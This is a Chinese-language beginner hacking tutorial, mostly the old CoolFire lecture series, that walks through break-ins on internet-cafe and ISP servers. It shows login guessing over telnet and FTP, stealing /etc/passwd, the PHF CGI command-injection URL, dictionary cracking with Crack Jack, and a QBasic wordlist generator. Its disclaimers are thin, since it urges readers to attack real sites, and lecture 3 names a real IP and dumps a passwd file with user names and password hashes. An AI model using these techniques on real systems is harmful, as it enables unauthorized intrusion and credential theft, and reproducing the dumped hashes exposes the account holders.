最简单的黑客入门教程目录1 黑客简介 (2)2 保护自己电脑绝对不做黑客肉鸡 (2)3 抓肉鸡的几种方法 (5)4 防止黑客通过Explorer侵入系统 (9)5 SQL注入详解 (10)5.1 注入工具 (11)5.2 php+Mysql注入的误区 (11)5.3 简单的例子 (12)5.4 语句构造 (14)5.5 高级应用 (22)5.6 实例 (26)5.7 注入的防范 (29)5.8 我看暴库漏洞原理及规律1 (29)5.9 我看暴库漏洞原理及规律2 (32)6 跨站脚本攻击 (34)6.1 跨站脚本工具 (34)6.2 什么是XSS攻击 (35)6.3 如何寻找XSS漏洞 (35)6.4 寻找跨站漏洞 (36)6.5 如何利用 (36)6.6 XSS与其它技术的结合 (37)7 XPath注入 (38)7.1 XPath注入介绍 (38)7.2 XPath注入工具 (41)声明：文章来源大多是网上收集而来，版权归其原作者所有。

1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。

关于"黑客"一词的经典定义，最初来源于麻省理工学院关于信息技术的一份文档，之后便被新闻工作者们长期使用。

但是这个在麻省理工被当做中性词汇的术语，却逐渐被新闻工作者们用在了贬义的环境，而很多人也受其影响，最终导致了"黑客"一词总是用于贬义环境。

有些人认为，我们应该接受"黑客"一词已经被用滥并且有了新的意义。

他们认为，如果不认可这种被滥用的词汇，那么将无法与那些不懂技术的人进行有效的交流。

而我仍然认为，将黑客和恶意的骇客(cracker)分开表述，对交流会更有效，比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象，从而能够达到更好的沟通交流效果，也避免了对"黑客"一词的滥用。

CoolFire系列讲座第1讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!#1 甚么是Hacking ?就是入侵电脑! 有甚么好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最好不要成为一个"骇客", 我... 不是!#2 为甚么要Hack ?我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作!! 为了安全性而作革命!#3 Hack 守则1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料!!2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.3. 不要轻易的将你要Hack 的站台告诉你不信任的朋友.4. 不要在bbs 上谈论你Hack 的任何事情.5. 在Post 文章的时候不要使用真名.6. 正在入侵的时候, 不要随意离开你的电脑.7. 不要侵入或破坏政府机关的主机.8. 不在电话中谈论你Hack 的任何事情.9. 将你的笔记放在安全的地方.10. 想要成为Hacker 就要真正的Hacking, 读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!11. 已侵入电脑中的帐号不得清除或修改.12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开!!13. 不将你已破解的帐号分享与你的朋友.#4 破解之道1. 进入主机中2. 得到/etc/passwd3. 得到系统帐号4. 得到最高权限-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1.进入主机有好几种方式, 可以经由Telnet (Port 23) 或SendMail (Port 25)或FTP 或WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要"进入" 该主机, 这些Port 都是很好的进行方向. 当然还有很多Port, 但是DayTime 的Port 你能拿它作甚么??? 我不知道, 你知道吗?!底下的示范并不是像写出来的那么容易, 只不过是要让你解如何进入, 当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛...示范进入主机的方法: (By CoolFire)(首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也就是Crack过的主机, 然後利用它来Crack 别的主机, 才不会被别人以逆流法查出你的所在)Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0(我用的是 ... 当然是假的罗, 都已经经过修改了啦!!没有这一台主机啦!! 别怕! 别怕! 以下的主机名称都是假的名称, 请同学们要记得!!)Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是......)> telnet (Telnet 试试看....)Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(没关系, 再来!!)cool login: hinetPassword:Login incorrectcool login:(都没猜对, 这边用的是猜的方法, 今天运气好像不好)telnet> closeConnection closed.(重来, 换个Port 试试看!!)> telnet 111.222.255.255 80Trying 111.222.255.255...Connected to 111.222.255.255.Escape character is '^]'.<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>Error 400</H1>Invalid request "" (unknown method)<P><HR><ADDRESS><A HREF="">CERN-HTTPD 3.0A</A></ADDRESS></BODY></HTML>Connection closed by foreign host.(哇哩!! 连密码都没得输入, 真是..... 再来!! 要有恒心!!)(换FTP Port 试试)> ftp 111.222.255.255Connected to 111.222.255.255.220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (111.222.255.255:FakeName): anonymous331 Guest login ok, send your complete e-mail address as password.Password:230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@230-If you do have problems, please try using a dash (-) as the first character230-of your password -- this will turn off the continuation messages that may230-be confusing your ftp client.230-230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binary mode to transfer files.(哇! 可以用anonymous 进来耶!! password 部份输入aaa@ 就好了! 不要留下足迹喔!!)ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.(嗯嗯... 太好了! 进来了!! 下一个目标是.....)ftp> cd etc250 CWD command successful.ftp> get passwd (抓回来!!)200 PORT command successful.150 Opening BINARY mode data connection for passwd (566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds (0.93 Kbytes/s)(喔... 这么容易吗??)ftp> !cat passwd (看看!!!)root::0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1::/home/ftp:/bin/bash(哇哩... 是Shadow 的... 真是出师不利.... )ftp> bye221 Goodbye.(不信邪.... 还是老话, 要有恒心....)(FTP 不行, 再Telnet 看看!!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(又猜错!!)cool login: fuckyouPassword:Last login: Mon Dec 2 09:20:07 from 205.11.122.12Linux 1.2.13.Some programming languages manage to absorb change but withstand progress.cool:~$(哇哈哈!! 哪个笨root, 用system name 作username 连password 也是system name.... 总算... 没白玩...)cool:~$ systembash: system: command not found(嗯... 这个user 的权限好像不大....)cool:~$ lscool:~$ pwd/home/fuckyoucool:~$ cd /cool:/$ lsPublic/ cdrom/ lib/ mnt/ tmp/ www/README dev/ linux* proc/ usr/bin/ etc/ local/ root/ var/boot/ home/ lost+found/ sbin/cool:/$ cd etctelnet> quit(好想睡呀!! 不玩了!! 下节课再开始....)Connection closed.> exit(走了!! 下节课在见啦!! 今天就上到这里! 老师要先下班了!!)(有学生说: 骗人! 还没有破解呀!! 胡说! 不是已经进来了吗???看看这节课上的是甚么??? ---->进入主机!! 嗯.....)-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 2.上节课抓回来一个"乱七八糟" 的/etc/passwd, 你以为我的真那么笨吗?? guest 所抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经"猜" 到了一个不是guest 的username 及password. 今天就以它来进入主机瞧瞧!!Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是.....呵...)> telnet (Telnet 试试看.... 昨天的位址, 有作笔记吧!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrectcool login: fuckyouPassword: (一样输入fuckyou)Last login: Mon Dec 1 12:44:10 from Linux 1.2.13.cool:~$ cd /etccool:/etc$ lsDIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cfX11@ hosts messages/ sendmail.stXF86Config hosts.allow mtab servicesat.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@(找寻目标..... 太乱了! 懒得找, 再来....)cool:/etc$ ls pa*passwd passwd.OLD passwd.old(果然在)cool:/etc$ more passwd(看看有没有Shadow...)root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(正点! 一点都没有防备!!)cool:/etc$ exitlogout(走了!.... 换FTP 上场!!)Connection closed by foreign host.> ftp Connected to .220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (:66126): fuckyou331 Password required for fuckyou.Password:230 User fuckyou logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /etc250 CWD command successful.ftp> get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd (350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds (1.9 Kbytes/s)ftp> !cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(看看! 呵! 假不了!!......)ftp> bye221 Goodbye.> exit(闪人罗!! 下课!!.... 喔慢点, 还有事要说明......)passwd 的Shadow 就是把passwd 放在shadow 档中, 而你原先在第一节课所看到的这个格式的passwd 并不是真正的passwd....root::0:0:root:/root:/bin/bash因为密码的部份没有东西.... 所以拿了也没有用!! 但这一节课所拿到的东西呢, 像是这样, 有几点需要说明的, 就是它究竟代表著甚么???john:234ab56:9999:13:John Smith:/home/john:/bin/sh它以":" 分成几个栏位, 各栏位对照如下:User Name: johnPassword:234ab56User No: 9999Group No: 13Real Name: John SmithHome Dir: /home/johnShell: /bin/sh了吧! 了吧! 保留著你千辛万苦所拿到的passwd, 咱们第三节课再来告诉各位如何使用Crack Jack 把passwd 解码.... 呵呵... zzZZzZzz...-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-Crack Jack V1.4 中文使用说明(By CoolFire 12-1-1996)嗯... 该到第三课了!! 累了的同学先去喝口水吧!这一节课咱们来说说Crack Jack ! 这可是个解读/etc/passwd 的好工具喔, 不要告诉我你习惯用Brute, 拿Brute 跟Crack Jack 的速度比比看, 包准你马上投向Crack Jack 1.4 的怀抱, 但请先确定你所使用的是Crack Jack 1.4, 你可以在CoolFire 的Hacker&Mailer Page 中拿到这个版本的Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上! 但还是要讲讲它的缺点... 就是只能在DOS 跟OS2 中跑, 如果在Windoz 95 上开个DOS Mode 跑, 它可是连理都不会理你的!OK! 现在切入正题! etc/passwd 拿到手了吧!! 开始罗!! 使用Crack Jack 1.4 前所需要的东西有这些[1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在Unix 系统中的/etc/ 目录中找到passwd [3] 字典档(哪里找, 自己敲... 呵ClayMore 中有一份DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用Crack Jack 1.4 前需先确定你所使用的机器是386 含以上CPU 的! 然後最好有充足的记忆体!!开始Jack 时只要敲入JACK 即可, 它会问你PW Name... 输入你的passwd 档名, DictionaryName 输入你的字典档名, Jack 就会开始找了! 找到时会告诉你, 也会在JACK.POT 中写入它所找到的密码!! 但... 有点怪的格式! 如果找到的是具root 权限的密码, Jack 会告诉你This isJackAss... 嗯...说脏话了!! 因为使用Jack 占用的时间实在太多, 如果你中途想要停掉时只要按下Ctrl-C 即可, 别以为你前功尽弃了! 因为Jack 有个Restore 的功能, 中断时会自动存档为RESTORE, 下次要继续这次的寻找只要输入Jack -Restore:RESTORE 即可!! 当然你也可以为你的Restore 重新命名! Jack 也会找得到的... 如Ren restore restore.HNT 之後要再寻找的时後就Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的Restore 前次所寻找的字串...继续帮你找下去....字典档哪里找: 我的不给你! 可以找别的Brute Force 之类的程式, 有些里面会附, 或是找找其它的Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有一点资料栏位及写程式的基础.[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的root 权限密码! Jack 好正点呀!!!所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧!!继续CoolFire系列讲座第2讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!话说上次CoolFire 讲到许多的Net Coffee 店, 安全性之差实在是没话说,但是过了这麽久也不见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像CoolFire这样温和, 如果遇到的是比较狠一点的角色, 那你的Net Coffee 可能要有一两天只卖Coffee 而没办法再Net 下去了!!继CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢?? 这次咱们不谈新的花招,用用之前所讲的再来探险一番, 当然, 这一次我照往例还是不会使用真正的Domain Name 来作教学,但是课程中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop....**谈一下Crack Jack 猜猜密码许多人从上一次介绍Crack Jack 之後就应该已经领教过它的功力了,但是有几点需要说明的,有些人使用Jack 来帮你寻找password, 我就当你已经抓到了没有shadow 的/etc/passwd,但是为甚麽使用Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为Jack 还是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,那当然连一个小小帐号的密码你都别想猜到了. 数一下你所使用的字典档中有多少字???我用的字典档有十九万多个字, 你的呢? 是不是小巫见大巫呀?? 那麽就赶快充实一下字典档再重新寻找吧!!许多人的密码都有一定的法则, 我自己写了PaSs2DiC 就是将UserName 由passwd档转成字典档的工具, 这是对一些喜欢使用UserName 当作Password 的人最好的方式,但是也曾经好运的找到别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的ID 作为密码的???你可以很简单的使用Qbasic 来制作"序数" 密码, 或日期密码, 底下简单的作一个0101 (一月一日) 到1231 的密码档出来:------------Cut Here MakeDate.BAS -------------------Open "Dates" for output as #1for I=1 to 12for J=1 to 31I1$=rtrim$(ltrim$str$(I)))J1$=rtrim$(ltrim$str$(J)))if len(I1$)=1 then I1$="0"+I1$if len(J1$)=1 then J1$="0"+J1$Out$=I1$Content$J1$print #1,Out$next Inext Jclose------------ Cut Here End MakeDate.BAS ----------------这支小程式将会写一个"DATES" 的档案, 里面就是你要的字典, 当然啦,这只是包含月跟日!!如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再Run 一次试试看了,不过这是一个好的开始不是吗??**如何保护自己的密码谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,请遵守以下的原则: [1]不用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大) [3]不用身份证字号作为密码(LetMeIn! 里有猜身份证字号的功能耶)[4]不用在字典中查得到的字作为密码.那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:用一句有意义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型, 基於这个密码猜法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调?? 如果你的密码是coolfire,建议你最好能改成CoolFire 或coolfires (加复数"s"),这样被猜中的机率就小了很多. 如果你是一个Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@**正式的话题这次的话题当然还是Crack, 相信许多人已经看过CoolHC#1 了,当然眼尖的人可能也已经D/LSystem Holes 试过了, 你有成功的例子吗?? 如果没有, 这份CoolHC#2可能就是你的强心针,因为这次谈的正是System Holes #1 成功的案例.Step 1. 连线到"蕃薯藤" 找"网路咖啡" 找到好多家网路咖啡的WWW 网址, 一一连上去试试看在System Holes #1 中的方法可不可行.Step 2. 若可行则会传回/etc/passwd 资讯, 存档後迅速Logout, 使用Crack Jack解读!![[实例探讨]]System Holes #1 中所介绍的WWW 入侵法是这样子的:/cgi-bin/nph-test-cgi?* 後再/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd[1] 用WWW Browser 连到[2] Location 输入--> "/cgi-bin/nph-test-cgi?*"[3] 接著如果出来一份像Report 的画面的话, 接著输入/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd[4] 发生了甚麽事?? etc/passwd 在你的浏览器中"显示" 出来了!! 快点Save 吧!!这个方法所用的是系统"检索" 的漏洞, 不提供这个功能,或是伺服器检索类型不同的机器则不会接受这样的指令, 当然也就逃过我们这次的模拟演练啦!! 但是.... 相信我,你一定会找到一家脱线的网路咖啡, 并没有像我们一样每天阅读Mail List 的信,对系统安全一点研究也没有的人不在少数. 就是这样的一个Net Coffee Shop... 呵.... 快来试试吧!!当CoolFire 抓到/etc/passwd 後, 立刻存档, 也马上断线, 并且拿出UltraEdit 来瞧一下使用者的资讯, 当然这个小passwd 对Crack Jack 来说, 实在是不够看,没几分钟就在我的486 机器上显示出来几个以UserName 作为Password 的资讯(归功於PaSs2DiC 及CrackJack 的功劳)不过当我试著找寻root 的密码时, 一想到我那将近20 万字的字典档,就想到可能花费的时间一定相当的惊人, 於是就以Jack 的Option 设定只寻找root 那一行, ...(过了良久)... 果不然又是一个笨root. 用了"非常" 容易猜的密码... <--- This is JackAss... 呵!! GotIt!如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用Crack Jack,不然你也可以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是486DX4-13032MB RAM, 3.2GB HDD, 近20 万字的字典档, 如果在分析较大的passwd档时我会将字典档切割为四至五个小档(看有多少台机器可跑),然後在周末下班前在公司的几台机器上分别执行CrackJack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd 档又很大的话,由於Crack Jack 无法於Windoz 95 下使用, 你可能只能牺升时间或机器来跑了! 再没有办法的话, 亦可使用单机多工, 多开几个DOS Box 来跑Brute, 也许也是一个可行的办法!**後语有许多人在使用Crack Jack 的时候有许多问题, 不过看了CoolHC#1 应该都解决了吧?? 最近大家问的比较多的是UpYours 3.0, 虽然已经改进了Install 的问题,不过大家的问题还是都出在Winsck.ocx 上面, 有人说装了MSICP Beta 会好?? 但也有实例装了也还不能Run 的,在此建议大家不要再玩MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,已经证实有许多常用的MailBomb 没有办法Fake IP 了!! 所以... 如果UpYours 3.0装不起来的人就试试KaBoom!V3.0 吧! 虽然没有办法Fake IP (选错Mail Server 的话), 但是也是一个不错的AnonyMailer如果要发匿名信, 现在首页上有可以帮你发信的Mailer, 会安全一点.如果你仍旧对UpYours 3.0 不死心, 就试试ResSvr32.exe (Under Windows/systemdirectory),看看能不能将WinSck.ocx 装上了... 记得先UnReg 再Reg...在此建议大家可以多订阅一些"系统安全" 讨论的Mail List或多参考一些已经被找出来的系统漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,如果能够多参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,放在手边参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是SendMail 的Bug 实例,在这中间当然照往例会先出一份System Holes #2 来作为资料. 如果有兴趣的人在SH#2 出来的时候可以先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......------上次讲的Home Page 建置案还没搞完, 没有充实一下Home Page 实在是对不起大家,所以利用一点时间写了CoolHC#2, 可能报告又交不出来了!! 老话,如果你有兴趣写其它程式的中文说明, 请完成後寄一份给我, 我将它放在Home Page 上面让其它人参考,当然你也可以给我你的使用心得, 让别人参考看看也行! 目前准备收集一系列的System Hole List,如果你在其它的站台有看到的, 请把它先Cut 下来, Mail 一份给我!------再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上(又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它Shut Down.... 好了! 别太暴力了!CoolFire系列讲座第3讲:如何连接ISP并且对其解码作者:CoolFire [coolfires@] (2001-10-13 08:05:00) CoolHC Volume 3 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!前几次说到了Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或是帐号被人盗用的客户不就糗大了! 但是CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的W3 密码,误入一个号称第一个提供网路拨接的ISP, 且在CoolFire 顺利的抓回/etc/passwd 之後, 使用了自己写的PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了9 组ID 与Password 相同的密码,勿怪我没有在这里提醒大家, 还好我没有找到root password, 不然可能该系统就此停摆, 不可再见天日也! (当然我不可能这么作啦!).看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上CoolFire 最近开会的时候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强, 可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃! 大家要小心呀!ISP 是一般User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确的网路使用观念(Password 的设定及proxy 的使用等), 实在不敢想像这样的网路发展到几年後会是甚么样子??这一次的说明还是没有谈到新的技巧, 在James 将首页更新後各位应该已经可以从中学到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯(入侵本国的网路则不用, 反正没人重视网路安全..... 真失望), 在别人还没将Bug 修正之前就抢先一步拿到/etc/passwd, 所以订阅一些网路安全的Mail List 是必要的, 多看一些网安有关的News Group 也是必要的(不仅Hacker 如此, ISP 更要多注意这些资讯!). 日後有空再整里一些Mail List 给大家!!本次主题: 说明如何连接该ISP 并且对其/etc/passwd 解码连接位址: (203.66.169.11)特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以CoolFire 已经Mail 给该网页之维护人员更改密码, 但该网页之ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!Mail sent to dhacme@:Subject: 请速更动网页密码From: CoolFire <coolfires@>你的网页作得不错, 但是因为你所设定的密码太容易为骇客所? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次若网页遭到篡改, 本人概不负责!!**** 课程开始****请注意: 由於本次所作的课程内容以实作为主, 除了本人IP 有所更改, 一切都使用本人所用之Telnet 软体Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容, 否则本人概不负责!(连线到某一主机之後.... 此处的.tw 是假的Domain name).tw> telnet Trying 203.66.169.11...Connected to .Escape character is '^]'.Password: (随便按一下Enter)Login incorrectwww login: coffee (以Hacker 的敏锐判断username=coffee password=coffee)Password:Last login: Thu Jan 9 10:41:52 from .tw欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!================================================================= (直接进入核心部份)www:~$ cd /etcwww:/etc$ lsDIR_COLORS hosts.equiv printcapHOSTNAME hosts.lpd profile NETWORKING inet@ protocolsNNTP_INEWS_DOMAIN inetd.conf psdevtabX11@ inittab rc.d/at.deny inittab.gettyps.sample resolv.confbootptab ioctl.save rpccsh.cshrc issue securettycsh.login securetty.olddefault/ klogd.pid sendmail.cfdiphosts ld.so.cache sendmail.stexports ld.so.conf servicesfastboot lilo/ shellsfdprm lilo.conf shutdownpidfs/ localtime skel/fstab magic slip.hostsftp.banner mail.rc slip.loginftp.deny motd snooptabftpaccess motd.bak sudoersftpconversions msgs/ syslog.confftpgroups mtab syslog.pidftpusers mtools termcapgateways named.boot ttysgettydefs networks utmp@group nntpserver vga/host.conf passwd wtmp@hosts passwd.OLD yp.conf.example hosts.allow passwd.oldhosts.deny ppp/(看看我们的目标长得如何???)www:/etc$ cat passwdroot:abcdefghijklmn:0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/usr/lib/news:uucp:*:10:14:uucp:/var/spool/uucppublic:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashnobody:*:-1:100:nobody:/dev/null:ftp:*:404:1::/home/ftp:/bin/bashguest:*:405:100:guest:/dev/null:/dev/nullshan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bashfax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bashtham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bashccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bashsk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bashservices:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bashrichard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bashlilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bashsupport:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bashstonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/cshbear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bashlance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime 